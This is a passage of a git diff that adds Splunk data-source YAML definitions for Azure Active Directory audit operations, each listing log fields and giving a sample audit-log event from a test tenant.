+  "strt_admin@splunkresearch.com", "ipAddress": "52.177.250.168", "roles": []}}, "targetResources":
+  [{"id": "0d664d57-a3ee-4049-8642-280a5c7243ef", "displayName": null, "type": "User",
+  "userPrincipalName": "User1@splunkresearch.com", "modifiedProperties": [{"displayName":
+  "Role.ObjectID", "oldValue": null, "newValue": "\"38bf5baf-7ec7-4bc2-8920-6d4044da12c2\""},
+  {"displayName": "Role.DisplayName", "oldValue": null, "newValue": "\"Privileged
+  Role Administrator\""}, {"displayName": "Role.TemplateId", "oldValue": null, "newValue":
+  "\"9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3\""}, {"displayName": "Role.WellKnownObjectName",
+  "oldValue": null, "newValue": "\"ApplicationAdministrators\""}], "administrativeUnits":
+  []}, {"id": "38bf5baf-7ec7-4bc2-8920-6d4044da12c2", "displayName": null, "type":
+  "Role", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails":
+  []}}'
diff --git a/data_sources/azure_active_directory_add_owner_to_application.yml b/data_sources/azure_active_directory_add_owner_to_application.yml
new file mode 100644
index 0000000000..fb86357ca7
--- /dev/null
+++ b/data_sources/azure_active_directory_add_owner_to_application.yml
@@ -0,0 +1,90 @@
+name: Azure Active Directory Add owner to application
+id: e895ed56-7be4-4b3a-b782-ecd0f594ec4c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add owner to application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- eventtype
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-06-20T15:54:13.2420879Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Add owner to application", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "durationMs": 0, "callerIpAddress": "20.190.135.43", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040",
+  "Level": 4, "properties": {"id": "Directory_231de5d4-2156-433a-8163-48956bdaa040_C21RW_365283677",
+  "category": "ApplicationManagement", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add owner to application",
+  "activityDateTime": "2023-06-20T15:54:13.2420879+00:00", "loggedByService": "Core
+  Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user":
+  {"id": "4d3f1865-b395-4430-91dc-1b9dd337712e", "displayName": null, "userPrincipalName":
+  "globaladmin@splunkresearch.com", "ipAddress": "20.190.135.43", "roles": []}}, "targetResources":
+  [{"id": "dd92f1af-43d7-47d9-b93c-a78c6b635180", "displayName": null, "type": "User",
+  "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName":
+  "Application.ObjectID", "oldValue": null, "newValue": "\"bb2479d8-5e89-4480-bb7e-3178d5a5d469\""},
+  {"displayName": "Application.DisplayName", "oldValue": null, "newValue": "\"CloudForge\""},
+  {"displayName": "Application.AppId", "oldValue": null, "newValue": "\"f0748f3d-45f2-4e2e-a4e1-f2e2b5271bdf\""}],
+  "administrativeUnits": []}, {"id": "bb2479d8-5e89-4480-bb7e-3178d5a5d469", "displayName":
+  null, "type": "Application", "modifiedProperties": [], "administrativeUnits": []}],
+  "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin
+  22.4.0 Darwin Kernel Version 22.4.0: Mon Mar  6 21:00:17 PST 2023; root:xnu-8796.101.5~3/RELEASE_X86_64;
+  en-US) PowerShell/7.3.4"}]}}'
diff --git a/data_sources/azure_active_directory_add_service_principal.yml b/data_sources/azure_active_directory_add_service_principal.yml
new file mode 100644
index 0000000000..c0a5ff1085
--- /dev/null
+++ b/data_sources/azure_active_directory_add_service_principal.yml
@@ -0,0 +1,88 @@
+name: Azure Active Directory Add service principal
+id: fd89d337-e4c0-4162-ad13-bca36f096fe6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add service principal
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2024-02-07T22:31:14.4970418Z", "resourceId": "/tenants/a417c578-c7ee-480d-a225-d48057e74df5/providers/Microsoft.aadiam",
+  "operationName": "Add service principal", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "a417c578-c7ee-480d-a225-d48057e74df5", "resultSignature":
+  "None", "durationMs": 0, "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2",
+  "Level": 4, "properties": {"id": "Directory_ea473f15-64b3-435a-a885-6ee3908919e2_GSOLK_21152854",
+  "category": "ApplicationManagement", "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add service principal",
+  "activityDateTime": "2024-02-07T22:31:14.4970418+00:00", "loggedByService": "Core
+  Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id":
+  "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+  "Herman@phantomengineering.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources":
+  [{"id": "2dedf863-ac93-4f45-87b3-e32f48145380", "displayName": "Malicious11", "type":
+  "ServicePrincipal", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue":
+  "[]", "newValue": "[true]"}, {"displayName": "AppPrincipalId", "oldValue": "[]",
+  "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "DisplayName",
+  "oldValue": "[]", "newValue": "[\"Malicious11\"]"}, {"displayName": "ServicePrincipalName",
+  "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName":
+  "Credential", "oldValue": "[]", "newValue": "[{\"CredentialType\":2,\"KeyStoreId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\"KeyGroupId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"}]"},
+  {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled,
+  AppPrincipalId, DisplayName, ServicePrincipalName, Credential\""}, {"displayName":
+  "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": "\"e06366ca-8489-4748-b6a2-d7e4332f45c1\""}],
+  "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
+  Gecko) Chrome/121.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "e06366ca-8489-4748-b6a2-d7e4332f45c1"}]}}'
diff --git a/data_sources/azure_active_directory_add_unverified_domain.yml b/data_sources/azure_active_directory_add_unverified_domain.yml
new file mode 100644
index 0000000000..f25e92be67
--- /dev/null
+++ b/data_sources/azure_active_directory_add_unverified_domain.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Add unverified domain
+id: d4c01fb1-3b88-46d3-bd12-9b9e256450f7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add unverified domain
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-26T13:45:54.1582053Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Add unverified domain", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+  "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "Level": 4, "properties":
+  {"id": "Directory_bdab88f3-69a4-4e66-883d-5b1e1558e61b_311NT_82497138", "category":
+  "DirectoryManagement", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add unverified
+  domain", "activityDateTime": "2023-07-26T13:45:54.1582053+00:00", "loggedByService":
+  "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+  {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+  "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+  "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com",
+  "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue":
+  "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue":
+  "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+  "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails":
+  [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/azure_active_directory_consent_to_application.yml b/data_sources/azure_active_directory_consent_to_application.yml
new file mode 100644
index 0000000000..e8015f8161
--- /dev/null
+++ b/data_sources/azure_active_directory_consent_to_application.yml
@@ -0,0 +1,98 @@
+name: Azure Active Directory Consent to application
+id: 4c5d6c49-53e3-4980-a4de-c63e26291ed0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Consent to application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- eventtype
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-27T16:14:14.9747033Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+  "operationName": "Consent to application", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature":
+  "None", "resultDescription": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException",
+  "durationMs": 0, "callerIpAddress": "13.85.188.242", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5",
+  "Level": 4, "properties": {"id": "Directory_864210f1-2950-47cb-9e12-1a71dcbdb1d5_DO21D_338329364",
+  "category": "ApplicationManagement", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5",
+  "result": "failure", "resultReason": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException",
+  "activityDisplayName": "Consent to application", "activityDateTime": "2023-10-27T16:14:14.9747033+00:00",
+  "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null,
+  "initiatedBy": {"user": {"id": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "displayName":
+  null, "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "ipAddress":
+  "13.85.188.242", "roles": []}}, "targetResources": [{"id": "6228c72e-8895-4681-bbda-238132dc4f3c",
+  "displayName": "Bad App 1", "type": "Application", "modifiedProperties": [{"displayName":
+  "ConsentContext.IsAdminConsent", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+  "ConsentContext.IsAppOnly", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+  "ConsentContext.OnBehalfOfAll", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+  "ConsentContext.Tags", "oldValue": null, "newValue": "\"WindowsAzureActiveDirectoryIntegratedApp\""},
+  {"displayName": "ConsentAction.Permissions", "oldValue": null, "newValue": "\"[]
+  => [[Id: AAAAAAAAAAAAAAAAAAAAALSZcc5Sj_NGtUtP2B3pYeI2veRXIpdKSpcpcgPY4Aty, ClientId:
+  00000000-0000-0000-0000-000000000000, PrincipalId: 57e4bd36-9722-4a4a-9729-7203d8e00b72,
+  ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: Principal, Scope:
+  Mail.Read Mail.Read.Shared Mail.ReadBasic Mail.ReadBasic.Shared Mail.ReadWrite Mail.ReadWrite.Shared
+  Mail.Send Mail.Send.Shared User.Read, CreatedDateTime: , LastModifiedDateTime ]];
+  \""}, {"displayName": "ConsentAction.Reason", "oldValue": null, "newValue": "\"Risky
+  application detected\""}, {"displayName": "MethodExecutionResult.", "oldValue":
+  null, "newValue": "\"Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException\""}],
+  "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+  "EvoSTS"}, {"key": "AppId", "value": "96f6a3d6-d5aa-4af5-a77a-9319b5283712"}]}}'
diff --git a/data_sources/azure_active_directory_disable_strong_authentication.yml b/data_sources/azure_active_directory_disable_strong_authentication.yml
new file mode 100644
index 0000000000..eee28e781d
--- /dev/null
+++ b/data_sources/azure_active_directory_disable_strong_authentication.yml
@@ -0,0 +1,80 @@
+name: Azure Active Directory Disable Strong Authentication
+id: 8f31966d-c496-496d-8837-f7fd11f31255
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Disable Strong Authentication
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-11T00:01:35.0251899Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Disable Strong Authentication", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "durationMs": 0, "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e",
+  "Level": 4, "properties": {"id": "Directory_7e3ee05c-ce4f-4ff1-8230-55555c25c97e_DADCR_14299826",
+  "category": "UserManagement", "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e",
+  "result": "success", "resultReason": "", "activityDisplayName": "Disable Strong
+  Authentication", "activityDateTime": "2023-07-11T00:01:35.0251899+00:00", "loggedByService":
+  "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+  {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+  "oops@splunkresearch.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id":
+  "94b969a3-11cb-4075-a1fd-9fee3daf692e", "displayName": null, "type": "User", "userPrincipalName":
+  "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "StrongAuthenticationRequirement",
+  "oldValue": "[{\"RelyingParty\":\"*\",\"State\":1,\"RememberDevicesNotIssuedBefore\":\"2023-07-11T00:01:26+00:00\"}]",
+  "newValue": "[]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+  "newValue": "\"StrongAuthenticationRequirement\""}], "administrativeUnits": []}],
+  "additionalDetails": []}}'
diff --git a/data_sources/azure_active_directory_enable_account.yml b/data_sources/azure_active_directory_enable_account.yml
new file mode 100644
index 0000000000..276c8accce
--- /dev/null
+++ b/data_sources/azure_active_directory_enable_account.yml
@@ -0,0 +1,81 @@
+name: Azure Active Directory Enable account
+id: cb49f3cd-04ad-415c-a5ed-9b27b2829fa7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Enable account
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:15.2223487Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Enable account", "operationVersion": "1.0", "category": "AuditLogs",
+  "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+  0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId":
+  "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413188",
+  "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497",
+  "result": "success", "resultReason": "", "activityDisplayName": "Enable account",
+  "activityDateTime": "2023-07-24T14:28:15.2223487+00:00", "loggedByService": "Core
+  Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+  {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+  "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5",
+  "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e",
+  "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com",
+  "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]",
+  "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue":
+  null, "newValue": "\"AccountEnabled\""}], "administrativeUnits": []}], "additionalDetails":
+  []}}'
diff --git a/data_sources/azure_active_directory_invite_external_user.yml b/data_sources/azure_active_directory_invite_external_user.yml
new file mode 100644
index 0000000000..5e3cd3df64
--- /dev/null
+++ b/data_sources/azure_active_directory_invite_external_user.yml
@@ -0,0 +1,82 @@
+name: Azure Active Directory Invite external user
+id: d3818bd5-f283-4518-8b67-df19240c3e40
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Invite external user
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-13T00:29:59.5100003Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Invite external user", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "durationMs": 0, "callerIpAddress": "40.126.4.40", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99",
+  "Level": 4, "properties": {"id": "Invited Users_e7d580a6-eaac-4f82-843c-40b0b5f3cf99_YNUMP_7291793",
+  "category": "UserManagement", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99",
+  "result": "success", "resultReason": null, "activityDisplayName": "Invite external
+  user", "activityDateTime": "2023-07-13T00:29:59.5100003+00:00", "loggedByService":
+  "Invited Users", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+  {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+  "oopsr@splunkresearch.com", "ipAddress": "40.126.4.40", "roles": []}}, "targetResources":
+  [{"id": "f416526a-17ee-4129-8ca9-f5ee55f69f34", "displayName": "oops", "type": "User",
+  "userPrincipalName": "oops360_gmail.com#EXT#@strtadminsplunkresearch.onmicrosoft.com",
+  "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key":
+  "oid", "value": "728989f4-eb3d-45c2-8741-2f2af4e485ce"}, {"key": "tid", "value":
+  "fc69e276-e9e8-4af9-9002-1e410d77244e"}, {"key": "ipaddr", "value": "2601:646:a000:200:c4db:f288:7e28:21b3"},
+  {"key": "wids", "value": "62e90394-69f5-4237-9190-012177145e10"}, {"key": "InvitationId",
+  "value": "65c7d12f-c6f3-44f0-8fad-4f57a1020484"}, {"key": "invitedUserEmailAddress",
+  "value": "oops360@gmail.com"}]}}'
diff --git a/data_sources/azure_active_directory_reset_password_(by_admin).yml b/data_sources/azure_active_directory_reset_password_(by_admin).yml
new file mode 100644
index 0000000000..f0906c6408
--- /dev/null
+++ b/data_sources/azure_active_directory_reset_password_(by_admin).yml
@@ -0,0 +1,79 @@
+name: Azure Active Directory Reset password (by admin)
+id: dcd0e4dc-68f8-4b77-a66f-89c57b3afa6b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Reset password (by admin)
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:55.0648789Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Reset password (by admin)", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "resultDescription": "None", "durationMs": 0, "callerIpAddress": "40.81.4.144",
+  "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "Level": 4, "properties":
+  {"id": "SSPR_724ff6ae-0f36-4f2f-a20f-f043e0c73006_P1CQE_8605821", "category": "UserManagement",
+  "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "result": "success", "resultReason":
+  "None", "activityDisplayName": "Reset password (by admin)", "activityDateTime":
+  "2023-07-24T14:28:55.0648789+00:00", "loggedByService": "Self-service Password Management",
+  "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce",
